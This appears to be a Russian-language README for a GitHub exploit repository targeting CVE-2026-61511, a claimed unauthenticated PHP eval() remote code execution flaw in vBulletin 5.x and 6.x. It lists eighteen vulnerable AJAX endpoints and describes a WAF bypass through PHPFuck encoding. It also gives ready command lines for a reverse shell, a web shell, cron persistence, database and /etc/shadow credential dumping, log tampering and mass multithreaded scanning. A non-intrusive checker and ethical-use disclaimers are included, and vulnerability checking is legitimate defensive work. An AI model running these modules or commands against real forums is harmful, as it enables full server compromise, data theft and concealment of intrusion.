
CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Уязвимость 5.x/6.x (без патча). Мультиэксплойт через Endpoint Pool, AJAX, обход WAF с помощью PHPFuck. Полный набор инструментов: reverse shell, прокси, персистентность, веб-шелл, операции с базой данных, контроль брандмауэра, управление журналами, массовое сканирование. 2 версии: мультиэксплойт и безопасная проверка. Python 3.8+ Используйте этично, оставайтесь в рамках закона. 🔒

⚠️ ТОЛЬКО ДЛЯ ЭТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, синих команд и пентестеров.
Несанкционированный доступ к компьютерным системам незаконен в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.
CVE‑2026‑61511 — это уязвимость внедрения PHP eval() в AJAX-движке рендеринга шаблонов vBulletin.
Затронутые версии: 5.0.0 – 5.7.5 и 6.0.0 – 6.2.1.
Несколько конечных точек атаки – ошибка существует в нескольких AJAX-обработчиках:
/ajax/render/pagenav/ajax/api/ad/replaceAdTemplate/ajax/render/widget_php/ajax/render/widget_tabbedcontainer_tab_panel/ajax/api/content_* /getIndexableContentКодирование PHPFuck – полезная нагрузка преобразуется в последовательность операторов PHP и чисел, которая обходит WAF-фильтры и позволяет выполнять произвольный PHP-код.
Аутентификация не требуется – злоумышленник может отправить специально сформированный POST-запрос на любую уязвимую конечную точку и выполнять системные команды с привилегиями веб-сервера.
Воздействие – полный компрометация сервера, кража данных, бэкдоры, горизонтальное перемещение и закрепление. Обновите версию!
| Инструмент | Назначение | Целевой пользователь |
|---|---|---|
exploit.py | Полный набор инструментов с обратной оболочкой, закреплением, файловыми операциями, дампом базы данных, управлением брандмауэром, управлением журналами, пробросом портов, развертыванием SSH-ключей, сетевым сканированием и массовым сканированием (многопоточным). |
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt
Содержимое requirements.txt:
request
urllib3
Это программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности.
| Красные команды / авторизованные пентестеры |
safecheck.py | Неинтрузивный верификатор, который проверяет уязвимость без выполнения каких-либо вредоносных нагрузок. Определяет версию, тестирует все конечные точки и генерирует подробный отчет. | Синие команды / аудиторы безопасности |
| Функция | exploit.py | safecheck.py |
|---|
| Обнаружение уязвимости | ✅ | ✅ |
| Определение версии | ✅ | ✅ |
| Тестирование нескольких конечных точек (18 путей) | ✅ | ✅ |
| Выполнение команд | ✅ | ❌ |
| Обратная оболочка | ✅ | ❌ |
| Загрузка/скачивание файлов | ✅ | ❌ |
| Механизмы закрепления | ✅ | ❌ |
| Развертывание веб-оболочки | ✅ | ❌ |
| Операции с базой данных | ✅ | ❌ |
| Сбор информации о системе | ✅ | ✅ |
| Управление брандмауэром | ✅ | ❌ |
| Управление журналами | ✅ | ❌ |
| Проброс портов | ✅ | ❌ |
| Развертывание SSH-ключей | ✅ | ❌ |
| Сетевое сканирование | ✅ | ❌ |
| Массовое сканирование (многопоточное) | ✅ | ❌ |
| Поддержка прокси | ✅ | ✅ |
| Вывод JSON-отчета | ✅ | ✅ |
| Интерактивное меню | ✅ | ❌ |
| Неинтрузивный (безопасный) режим | ❌ | ✅ |
| Режим Verbose/Debug | ✅ | ✅ |
| Выполнение пользовательских команд | ✅ | ❌ |
| Объединение нескольких команд | ✅ | ❌ |
| Чтение удаленных файлов | ✅ | ❌ |
| Запись удаленных файлов | ✅ | ❌ |
| Управление системными пользователями | ✅ | ❌ |
| Методы обхода брандмауэра | ✅ | ❌ |
| Обход WAF (PHPFuck) | ✅ | ✅ |
| Сценарий | Рекомендуемый инструмент |
|---|
| Синяя команда – проверка, уязвима ли ваша установка vBulletin | safecheck.py |
| Аудит безопасности – неинтрузивная оценка уязвимостей | safecheck.py |
| Красная команда – авторизованное пентестирование с полной эксплуатацией | exploit.py |
| Bug Bounty – тестирование с ответственным раскрытием | safecheck.py |
| Массовое сканирование – проверка нескольких целей на уязвимость | exploit.py (только обнаружение) |
| Реагирование на инциденты – проверка, скомпрометированы ли системы | safecheck.py |
| Параметр | Описание |
|---|
-t, --target | URL цели (например, http://forum.com/vb) |
--proxy | HTTP-прокси (например, http://127.0.0.1:8080) |
--timeout | Таймаут запроса в секундах (по умолчанию: 10) |
--retry | Количество повторов на путь (по умолчанию: 3) |
--output | Сохранить подробный отчет в JSON-файл |
-v, --verbose | Подробный вывод |
-q, --quiet | Тихий режим (минимальный вывод) |
--lhost | Обязательно для эксплойта – IP для обратного вызова |
--lport | Порт для обратного вызова (по умолчанию: 4444) |
--threads | Потоки для массового сканирования (по умолчанию: 5) |
--exploit | Выполнить эксплуатацию после обнаружения |
--full | Полная атака (все модули) |
--shell | Запустить обратную оболочку |
--webshell | Установить веб-оболочку (/shell.php) |
--persist | Установить закрепление (cron-задание) |
--dump | Сделать дамп базы данных |
--dump-creds | Сделать дамп учетных данных (/etc/passwd, /etc/shadow) |
--interactive | Интерактивное меню после успешной проверки |
| # | Сценарий | Команда |
|---|
| 1 | Быстрая проверка уязвимости | python safecheck.py -t http://target.com/vb |
| 2 | Детальное сканирование с отчетом | python safecheck.py -t http://target.com/vb --output report.json -v |
| 3 | Обратная оболочка | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell |
| 4 | Полная атака (все модули) | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full |
| 5 | Массовое сканирование из файла | python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json |
| 6 | Режим интерактивного меню | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive |
| # | Конечная точка |
|---|
| 1 | /ajax/render/pagenav |
| 2 | /ajax/render/pagenav?template=page |
| 3 | /ajax/api/ad/replaceAdTemplate |
| 4 | /ajax/render/widget_php |
| 5 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 6 | /ajax/api/content_infraction/getIndexableContent |
| 7 | /ajax/api/content_video/getIndexableContent |
| 8 | /ajax/api/content_text/getIndexableContent |
| 9 | /ajax/api/content_report/getIndexableContent |
| 10 | /ajax/api/content_redirect/getIndexableContent |
| 11 | /ajax/api/content_privatemessage/getIndexableContent |
| 12 | /ajax/api/content_poll/getIndexableContent |
| 13 | /ajax/api/content_photo/getIndexableContent |
| 14 | /ajax/api/content_link/getIndexableContent |
| 15 | /ajax/api/content_gallery/getIndexableContent |
| 16 | /ajax/api/content_event/getIndexableContent |
| 17 | /ajax/api/content_channel/getIndexableContent |
| 18 | /ajax/api/content_attach/getIndexableContent |